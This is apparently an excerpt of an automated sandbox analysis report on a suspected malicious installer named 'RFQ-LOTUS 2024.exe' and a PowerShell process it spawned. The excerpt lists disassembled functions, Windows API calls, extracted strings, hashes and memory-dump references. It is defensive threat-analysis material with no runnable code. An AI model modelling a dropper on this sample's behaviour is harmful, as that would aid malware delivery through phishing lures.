API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3081826266
Opcode ID: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
Instruction ID: 3776da6525f732e5293341d69cc0e540229ccfe12881bb96e40b78ab3c334061
Opcode Fuzzy Hash: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
Instruction Fuzzy Hash: C7D0A771141534AAC221EB469C04CDF639C9F46304341403FF501B30A2C77C5D5187FE

Uniqueness

Uniqueness Score: -1.00%

Function 00402D8A Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00402F6A,00000001,?,?,"C:\Users\user\Desktop\RFQ-LOTUS 2024.exe",00403513,?), ref: 00402D9D
GetTickCount.KERNEL32 ref: 00402DBB
CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
ShowWindow.USER32(00000000,00000005,?,?,"C:\Users\user\Desktop\RFQ-LOTUS 2024.exe",00403513,?), ref: 00402DE6

Memory Dump Source

Source File: 00000000.00000002.1722339671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1722255161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722439170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-LOTUS 2024.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 3ba6df06d1a8a2ebff1cb487cdf72ecd2568b7f3d734aee4a10920d39395f5c6
Instruction ID: ad8085ed609e9a9848802d48f5936c49a501436460537f39ac663ee6903d91f9
Opcode Fuzzy Hash: 3ba6df06d1a8a2ebff1cb487cdf72ecd2568b7f3d734aee4a10920d39395f5c6
Instruction Fuzzy Hash: D2F05831526A21ABC6A16B24FE8CA9B7B64AB84B11711847BF041B11F4DA7C0C92CB9C

Uniqueness

Uniqueness Score: -1.00%

Function 00403B4C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(00000000,007A7A20), ref: 00403BE4

Strings

1033, xrefs: 00403B50, 00403B5A, 00403BCB
"C:\Users\user\Desktop\RFQ-LOTUS 2024.exe", xrefs: 00403B4D

Memory Dump Source

Source File: 00000000.00000002.1722339671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1722255161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722439170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-LOTUS 2024.jbxd

Similarity

API ID: TextWindow
String ID: "C:\Users\user\Desktop\RFQ-LOTUS 2024.exe"$1033
API String ID: 530164218-3573892210
Opcode ID: 4a9363a6df4f188c469d9e85be5717e9923612549b1d7987802fb003682d7455
Instruction ID: 54645776255075cb8615a9bf9b42270142c769617333b00c78cd875754afbab4
Opcode Fuzzy Hash: 4a9363a6df4f188c469d9e85be5717e9923612549b1d7987802fb003682d7455
Instruction Fuzzy Hash: CA11D171B046019BC7249F15DC50A77376DEBC6719718C13BE802A7392DA3DAD028699

Uniqueness

Uniqueness Score: -1.00%

Function 004037E1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,004037B9,004035CF,?), ref: 004037FB
GlobalFree.KERNEL32(00000000), ref: 00403802

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004037E1

Memory Dump Source

Source File: 00000000.00000002.1722339671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1722255161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722439170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-LOTUS 2024.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3081826266
Opcode ID: 513cb66aec3b184b1656533b532479dca3ec5b33ad4594f499a54eb9bf6dfc70
Instruction ID: 2f8b8ce22cb5ec106cd91628dbf998760d49a3025a1d563264e19f72e628b131
Opcode Fuzzy Hash: 513cb66aec3b184b1656533b532479dca3ec5b33ad4594f499a54eb9bf6dfc70
Instruction Fuzzy Hash: 34E0C2338110309BC6219F54FE04B5ABB686F44F22F19803BF880BB2608BB81C428BD8

Uniqueness

Uniqueness Score: -1.00%

Function 00405A2D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,007B6800,007B6800,80000000,00000003,?,?,"C:\Users\user\Desktop\RFQ-LOTUS 2024.exe",00403513,?), ref: 00405A33
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,007B6800,007B6800,80000000,00000003,?,?,"C:\Users\user\Desktop\RFQ-LOTUS 2024.exe",00403513,?), ref: 00405A43

Strings

C:\Users\user\Desktop, xrefs: 00405A2D

Memory Dump Source

Source File: 00000000.00000002.1722339671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1722255161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722439170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-LOTUS 2024.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-224404859
Opcode ID: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
Instruction ID: b6b9263f7e6f7f33dca29af715431404939bf432e253a022a3dbfc1ec44a830d
Opcode Fuzzy Hash: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
Instruction Fuzzy Hash: D5D05EB2400920DAC322A704DC40D9F67A8EF52304746842AE840A6161D7785D818AAD

Uniqueness

Uniqueness Score: -1.00%

Function 00405B67 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E48,00000000,[Rename],00000000,00000000,00000000), ref: 00405B77
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405B8F
CharNextA.USER32(00000000,?,00000000,00405E48,00000000,[Rename],00000000,00000000,00000000), ref: 00405BA0
lstrlenA.KERNEL32(00000000,?,00000000,00405E48,00000000,[Rename],00000000,00000000,00000000), ref: 00405BA9

Memory Dump Source

Source File: 00000000.00000002.1722339671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1722255161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722439170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-LOTUS 2024.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: e0aa3f8b5d9062cafbb7b658161da2b40476d8243bb4b83799a9e8f5804b25e7
Instruction ID: 726002b591c2c836e0c8fef6507a3208c362efe389af0cd528cd0253ba47f693
Opcode Fuzzy Hash: e0aa3f8b5d9062cafbb7b658161da2b40476d8243bb4b83799a9e8f5804b25e7
Instruction Fuzzy Hash: A0F0C235101914EFD7029FA5DD00D9EBBB8EF06350B2140A9E840F7310D674FE019BA8

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 6556, Parent PID: 5220COMMON

Executed Functions

Function 04DDEFF8 Relevance: 1.5, Strings: 1, Instructions: 281COMMON

Download Yara Rule

Strings

\Vk, xrefs: 04DDF2AF

Memory Dump Source

Source File: 00000001.00000002.2580489748.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4dd0000_powershell.jbxd

Similarity

API ID:
String ID: \Vk
API String ID: 0-3272359581
Opcode ID: 440168d22ad8366afa9ad6c9bcc66810cc6aa4532be3f9ebbae778d09d4ba6c9
Instruction ID: a81785e837d3182a12cbd0c81e821d9a6e11b0695f6e8951f6cd8931e4581917
Opcode Fuzzy Hash: 440168d22ad8366afa9ad6c9bcc66810cc6aa4532be3f9ebbae778d09d4ba6c9
Instruction Fuzzy Hash: F4B12870E00209DFDF14CFA9D8857ADBBF2BF88314F148529D81AA7254EB74A846CB81

Uniqueness

Uniqueness Score: -1.00%

Function 07ADC3B8 Relevance: 21.9, Strings: 17, Instructions: 685COMMON

Download Yara Rule

Strings

$^q, xrefs: 07ADC48F
tP^q, xrefs: 07ADC85C
$^q, xrefs: 07ADC823
$^q, xrefs: 07ADC45E
tP^q, xrefs: 07ADC868
4'^q, xrefs: 07ADC6E6
$^q, xrefs: 07ADC817
$^q, xrefs: 07ADC7DC
(f~l, xrefs: 07ADCB03
$^q, xrefs: 07ADC47F
$^q, xrefs: 07ADC804
4'^q, xrefs: 07ADC4F9
$^q, xrefs: 07ADC7C0
4'^q, xrefs: 07ADC4ED
(f~l, xrefs: 07ADCAF9
$^q, xrefs: 07ADC7F8
4'^q, xrefs: 07ADC6DA

Memory Dump Source

Source File: 00000001.00000002.2593421722.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ad0000_powershell.jbxd

Similarity

API ID:
String ID: (f~l$(f~l$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-1291795487
Opcode ID: b3963449de9965517f1434f8e5f4fac305d3ba6c7dd79d2d5a83ce2a82afaba3
Instruction ID: e3b142c122fc0f5cc7eddea2881a0a33a12bb3e3bc760615f14be744052b8b22
Opcode Fuzzy Hash: b3963449de9965517f1434f8e5f4fac305d3ba6c7dd79d2d5a83ce2a82afaba3
Instruction Fuzzy Hash: 7732C5B1B002059FCB14CF68C544AAABBF2AFC9720F54846AD8269F355DB32DD45CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 07AD69A0 Relevance: 18.2, Strings: 14, Instructions: 748COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07AD7117
4'^q, xrefs: 07AD6E91
$^q, xrefs: 07AD70E6
$^q, xrefs: 07AD70D6
4'^q, xrefs: 07AD726E
tP^q, xrefs: 07AD705B
$^q, xrefs: 07AD6FD9
4'^q, xrefs: 07AD6A20
4'^q, xrefs: 07AD6E9D
tP^q, xrefs: 07AD7067
4'^q, xrefs: 07AD710B
4'^q, xrefs: 07AD7264
4'^q, xrefs: 07AD6A14
$^q, xrefs: 07AD6FBD

Memory Dump Source

Source File: 00000001.00000002.2593421722.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ad0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
API String ID: 0-1705291838
Opcode ID: 34818d983be6e4f7d2ae1d255c2c72ff68b31752767dc8d9ee623dda22e4c7bd
Instruction ID: 01bfb2660620cef7484b75bba360fb6fb687e4e2950da2621f1272810913ed49
Opcode Fuzzy Hash: 34818d983be6e4f7d2ae1d255c2c72ff68b31752767dc8d9ee623dda22e4c7bd
Instruction Fuzzy Hash: C43227B1B002058FCB189F69D9146AABBF2AFC9350F1484AAD426CF365DF32DD45C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 07AD3130 Relevance: 15.9, Strings: 12, Instructions: 920COMMON

Download Yara Rule

Strings

(f~l, xrefs: 07AD4565
x.ok, xrefs: 07AD3D18
tP^q, xrefs: 07AD3420
(f~l, xrefs: 07AD4A03
4'^q, xrefs: 07AD3295
4'^q, xrefs: 07AD3AD8
(f~l, xrefs: 07AD4A0D
tP^q, xrefs: 07AD3414
4'^q, xrefs: 07AD3289
-ok, xrefs: 07AD3D5D
4'^q, xrefs: 07AD3ACC
(f~l, xrefs: 07AD455B

Memory Dump Source

Source File: 00000001.00000002.2593421722.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ad0000_powershell.jbxd

Similarity

API ID:
String ID: (f~l$(f~l$(f~l$(f~l$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$x.ok$-ok
API String ID: 0-2113810999
Opcode ID: e91a3be8e8aca5976baa05656b1372b40d74b68b41a3dc1539556e1291ef003f
Instruction ID: 34b164be8bac134a1880184c8c6e5b9cb86ebea7da4bddfc3ec6fa5d15723316
Opcode Fuzzy Hash: e91a3be8e8aca5976baa05656b1372b40d74b68b41a3dc1539556e1291ef003f
Instruction Fuzzy Hash: C47291B0B00209DFDB14CB68C955BAABBF2EF89304F14C0A9E51A9F355CB71DD458B92

Uniqueness

Uniqueness Score: -1.00%

Function 07AD8548 Relevance: 14.7, Strings: 11, Instructions: 928COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07AD8982
4{l, xrefs: 07AD9031
4{l, xrefs: 07AD901B
-ok, xrefs: 07AD8BED
(f~l, xrefs: 07AD9326
x.ok, xrefs: 07AD8BA8
x.ok, xrefs: 07AD94F5
4'^q, xrefs: 07AD9128
(f~l, xrefs: 07AD9310
4'^q, xrefs: 07AD911C
4'^q, xrefs: 07AD898E

Memory Dump Source

Source File: 00000001.00000002.2593421722.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ad0000_powershell.jbxd

Similarity

API ID:
String ID: (f~l$(f~l$4'^q$4'^q$4'^q$4'^q$4{l$4{l$x.ok$x.ok$-ok
API String ID: 0-90159466
Opcode ID: b800f1b0f809e4301b859cb5a34b815f0f893e35832926e860d3012605972a39
Instruction ID: 0d281e4a48db17166e48a9a73cd912a26cb86937ddc693c4c5c107ffd5ef3646
Opcode Fuzzy Hash: b800f1b0f809e4301b859cb5a34b815f0f893e35832926e860d3012605972a39
Instruction Fuzzy Hash: 049270B0A40218DFDB54CB58CD55B9ABBB2FB89304F1080A9D9096F391CB72ED85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 04DDB908 Relevance: 10.5, Strings: 8, Instructions: 523COMMON

Download Yara Rule

Strings

8Nk, xrefs: 04DDC9F8
$^q, xrefs: 04DDBE87
h]k, xrefs: 04DDBB32
h]k, xrefs: 04DDBFD6
Hbq, xrefs: 04DDB9CE
$^q, xrefs: 04DDBB22
Ik, xrefs: 04DDC4C4
h]k, xrefs: 04DDC498

Memory Dump Source

Source File: 00000001.00000002.2580489748.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4dd0000_powershell.jbxd

Similarity

API ID:
String ID: 8Nk$Hbq$h]k$h]k$h]k$$^q$$^q$Ik
API String ID: 0-1391544293
Opcode ID: 4351fe7c64511f64edef5579717b44696e6293106de1f7a415e0e97717bce720
Instruction ID: 64b074c748311731de464dac1a5aad2ccbf1a800d198e899f757b4dd816e02a8
Opcode Fuzzy Hash: 4351fe7c64511f64edef5579717b44696e6293106de1f7a415e0e97717bce720
Instruction Fuzzy Hash: 3C225030B002189FDB25EB24D8547EEBBB6BF89704F1140A9D50AAB365DB35ED85CF81

Uniqueness

Uniqueness Score: -1.00%

Function 07AD4B98 Relevance: 10.4, Strings: 8, Instructions: 373COMMON

Download Yara Rule

Strings

x.ok, xrefs: 07AD4F6C
4'^q, xrefs: 07AD4EAD
-ok, xrefs: 07AD4FB1
4'^q, xrefs: 07AD4F2C
4'^q, xrefs: 07AD4EA1
4'^q, xrefs: 07AD4F20
(f~l, xrefs: 07AD4CC3
(f~l, xrefs: 07AD4CB9

Memory Dump Source

Source File: 00000001.00000002.2593421722.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ad0000_powershell.jbxd

Similarity

API ID:
String ID: (f~l$(f~l$4'^q$4'^q$4'^q$4'^q$x.ok$-ok
API String ID: 0-1193785750
Opcode ID: 64c6e5943974415e400d0044035d38581c46783478204942e84fb92a2c8f238a
Instruction ID: fc5dab162841acc3f24d8377cac14a25e4c5ad1a4ce7c8a5cc84ce0dcdfc762b
Opcode Fuzzy Hash: 64c6e5943974415e400d0044035d38581c46783478204942e84fb92a2c8f238a
Instruction Fuzzy Hash: 56E19FB0A012499FCB14DBA8C551B9EBBF3AF8C304F108469D9126F7A9CB71EC45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 07AD0778 Relevance: 6.8, Strings: 5, Instructions: 580COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07AD07DA
4'^q, xrefs: 07AD07E6
$^q, xrefs: 07AD0CC9
$^q, xrefs: 07AD0CD5
$^q, xrefs: 07AD0C61

Memory Dump Source

Source File: 00000001.00000002.2593421722.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ad0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3272787073
Opcode ID: 5a96ece687f219aa5154a95e81918b65da4c89dd7f3c1f33c4844e98a7bed744
Instruction ID: f80e1a97f577896df2c2ab5ff742410913381b8d75d33d31524ef1334b008197
Opcode Fuzzy Hash: 5a96ece687f219aa5154a95e81918b65da4c89dd7f3c1f33c4844e98a7bed744
Instruction Fuzzy Hash: BA1258B1B042069FCB149B79951076BBBF2AFC6211F1884ABD466CF362DA32DC45C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 07AD4B71 Relevance: 6.6, Strings: 5, Instructions: 313COMMON

Download Yara Rule

Strings

x.ok, xrefs: 07AD4F6C
-ok, xrefs: 07AD4FB1
4'^q, xrefs: 07AD4EA1
4'^q, xrefs: 07AD4F20
(f~l, xrefs: 07AD4CB9

Memory Dump Source

Source File: 00000001.00000002.2593421722.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ad0000_powershell.jbxd

Similarity

API ID:
String ID: (f~l$4'^q$4'^q$x.ok$-ok
API String ID: 0-2472508454
Opcode ID: 1e2ce61ea65962d38042545749cb4a0ccb8af6b738ef26786f25ba70fcc316bf
Instruction ID: 5ed83e8cd58c3c3d0782c20315fdb2728df309ffa8453ad8a10c3c24ec871d1d
Opcode Fuzzy Hash: 1e2ce61ea65962d38042545749cb4a0ccb8af6b738ef26786f25ba70fcc316bf
Instruction Fuzzy Hash: A5C19EB0A012459FDB14CB98C941B9EBBF2AF8C304F158069E9166F7A5CB71EC45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 07AD8E0D Relevance: 5.4, Strings: 4, Instructions: 426COMMON

Download Yara Rule

Strings

4{l, xrefs: 07AD901B
x.ok, xrefs: 07AD94F5
(f~l, xrefs: 07AD9310
4'^q, xrefs: 07AD911C

Memory Dump Source

Source File: 00000001.00000002.2593421722.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ad0000_powershell.jbxd

Similarity

API ID:
String ID: (f~l$4'^q$4{l$x.ok
API String ID: 0-824850452
Opcode ID: c5e1198eec6a69571585031c96668a08e0b12199ebc5e2db1c355d17680148b4
Instruction ID: 9e8b0f5b764c122eefbb9c633d0e934860af237216b65ed0fbfa3f66659492e4
Opcode Fuzzy Hash: c5e1198eec6a69571585031c96668a08e0b12199ebc5e2db1c355d17680148b4
Instruction Fuzzy Hash: 0B124EB4A00215DFDB64CB54C945B9AB7B2FB89304F10C0A9E91A6F351CB76ED85CF81

Uniqueness

Uniqueness Score: -1.00%

Function 07AD8FA1 Relevance: 5.3, Strings: 4, Instructions: 334COMMON

Download Yara Rule

Strings

4{l, xrefs: 07AD901B
x.ok, xrefs: 07AD94F5
(f~l, xrefs: 07AD9310
4'^q, xrefs: 07AD911C

Memory Dump Source

Source File: 00000001.00000002.2593421722.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ad0000_powershell.jbxd

Similarity

API ID:
String ID: (f~l$4'^q$4{l$x.ok
API String ID: 0-824850452
Opcode ID: 406e6386146ada242b321e4c6d223c528ae89cd0c9e434258fad582574d56e1e
Instruction ID: 88b12d4cb07a804f94ec3e4acdb6890e7c5c10a6cbeb762ba6f0cfa78c9dc1b6
Opcode Fuzzy Hash: 406e6386146ada242b321e4c6d223c528ae89cd0c9e434258fad582574d56e1e
Instruction Fuzzy Hash: F0E13BB4A00215DFDB64CB54C945B9AB7B2FB89304F10C0A9E91A6F791CB72ED85CF81

Uniqueness

Uniqueness Score: -1.00%

Function 07AD8DF7 Relevance: 5.3, Strings: 4, Instructions: 332COMMON

Download Yara Rule

Strings

4{l, xrefs: 07AD901B
x.ok, xrefs: 07AD94F5
(f~l, xrefs: 07AD9310
4'^q, xrefs: 07AD911C

Memory Dump Source

Source File: 00000001.00000002.2593421722.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ad0000_powershell.jbxd

Similarity

API ID:
String ID: (f~l$4'^q$4{l$x.ok
API String ID: 0-824850452
Opcode ID: 5748ee364783587db22eb0cabf031ed87248c29b8625d626ce17cd07cbefa179
Instruction ID: 0226b1b688ec3d37e451390ecda1abfbbb7554ddbc22e43cd34924c1a411a442
